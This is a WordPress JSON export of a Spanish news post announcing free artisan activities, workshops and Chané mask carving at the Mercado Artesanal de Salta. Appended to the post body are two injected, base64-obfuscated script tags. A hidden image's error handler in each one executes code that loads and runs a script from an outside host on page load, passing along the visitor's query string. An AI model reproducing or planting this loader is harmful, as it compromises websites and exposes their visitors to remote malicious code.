{"id":3869,"date":"2024-03-18T10:37:44","date_gmt":"2024-03-18T13:37:44","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3869"},"modified":"2025-08-13T23:58:15","modified_gmt":"2025-08-14T02:58:15","slug":"actividades-gratuitas-por-el-dia-internacional-de-los-artesanos","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3869","title":{"rendered":"Actividades gratuitas por el D\u00eda Internacional de los Artesanos"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-f8488cc24be101e19cacef53703b0739\" style=\"background-color:#c4123e\"><em>Las propuestas culturales se desarrollar\u00e1n en el Mercado Artesanal de Salta desde ma\u00f1ana 19 al 22 de marzo, con la participaci\u00f3n de las diferentes asociaciones y cooperativas de la instituci\u00f3n. Incluir\u00e1 una muestra en vivo de las producciones artesanales, charlas, proyecci\u00f3n, venta, hilado colectivo, entre otras.<\/em><\/h4>\n\n\n\n<p>Desde la&nbsp;<strong>Secretar\u00eda de Cultura de la Provincia<\/strong>, a trav\u00e9s del Mercado Artesanal de Salta, impulsa acciones que tienen como fin la promoci\u00f3n del trabajo y la producci\u00f3n artesanal.&nbsp;<\/p>\n\n\n\n<p>A&nbsp;partir de ma\u00f1ana&nbsp;19 y hasta el 22 de marzo, se llevar\u00e1n a cabo diferentes actividades gratuitas, en el marco del D\u00eda Internacional de los Artesanos. &nbsp;Las mismas tendr\u00e1n lugar del 19 al 22 de marzo en las instalaciones del Mercado Artesanal de Salta, Av. San Mart\u00edn 2555.<\/p>\n\n\n\n<p><strong>Cronograma<\/strong><br><strong>Martes 19 de marzo<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>De 11 a 18 horas: muestra en vivo de producciones artesanales \u201cArtesanos en Acci\u00f3n\u201d a cargo de artesanos y artesanas de las diferentes Asociaciones y Cooperativas del Mercado Artesanal de Salta.<\/li>\n\n\n\n<li>A las 12 horas: inicio del \u201cHilado Colectivo\u201d con lana de llama y oveja.<\/li>\n<\/ul>\n\n\n\n<p><strong>Mi\u00e9rcoles 20 de marzo<\/strong><\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>A las 17 horas: taller pr\u00e1ctico a cargo de Edith Rodr\u00edguez y Carlos Flores de La Bodeguita: Elaboraci\u00f3n de Mistela en Casa.<\/li>\n<\/ol>\n\n\n\n<p><strong>Jueves 21 de marzo<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>M\u00e1scaras Chan\u00e9: testimonio vivo de saberes y haceres ancestrales a cargo de la Cooperativa de Trabajo Artesanos de Oficio Ltda.<\/li>\n\n\n\n<li>A las 10 horas: presentaci\u00f3n de la actividad a cargo de la Lic. en Antropolog\u00eda, Fernanda Sola, autora del libro \u201cArtesan\u00edas de Salta\u201d.<\/li>\n\n\n\n<li>De &nbsp;10:30 a 13 horas: exposici\u00f3n, venta y talla en vivo de Mateo y Juli\u00e1n L\u00f3pez, miembros de la comunidad de Campo Dur\u00e1n, socios de la Cooperativa y artesanos mascareros de amplia trayectoria.<\/li>\n\n\n\n<li>De 18 a 20 horas: talla y pintura en vivo de las m\u00e1scaras.<\/li>\n<\/ul>\n\n\n\n<p><strong>Viernes 23 de marzo<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>De 10:30 a 13 horas: talla, exposici\u00f3n y venta de m\u00e1scaras.<\/li>\n\n\n\n<li>De 18 a 19:30 horas: talla de m\u00e1scaras en vivo.<\/li>\n\n\n\n<li>De 19:30 a 20:30 horas: charla \u201cEl artesanado como forma de vida\u201d a cargo del Dr. en Filosof\u00eda Alejandro Ruidrejo. Proyecci\u00f3n del documental sobre la comunidad Chan\u00e9 de Fernanda Sola y Jorge Barbati.<\/li>\n<\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/actividades-gratuitas-por-el-dia-internacional-de-los-artesanos-94664\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Las propuestas culturales se desarrollar\u00e1n en el Mercado Artesanal de Salta desde ma\u00f1ana 19 al 22 de marzo, con la participaci\u00f3n de las diferentes asociaciones y cooperativas de la instituci\u00f3n. Incluir\u00e1 una muestra en vivo de las producciones artesanales, charlas, proyecci\u00f3n, venta, hilado colectivo, entre otras. Desde la&nbsp;Secretar\u00eda de Cultura de la Provincia, a trav\u00e9s [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3870,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[16,17],"tags":[],"class_list":{"0":"post-3869","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-ferias-y-congresos","8":"category-sociales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3869"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3869"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3869\/revisions"}],"predecessor-version":[{"id":6819,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3869\/revisions\/6819"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3870"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3869"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3869"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3869"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}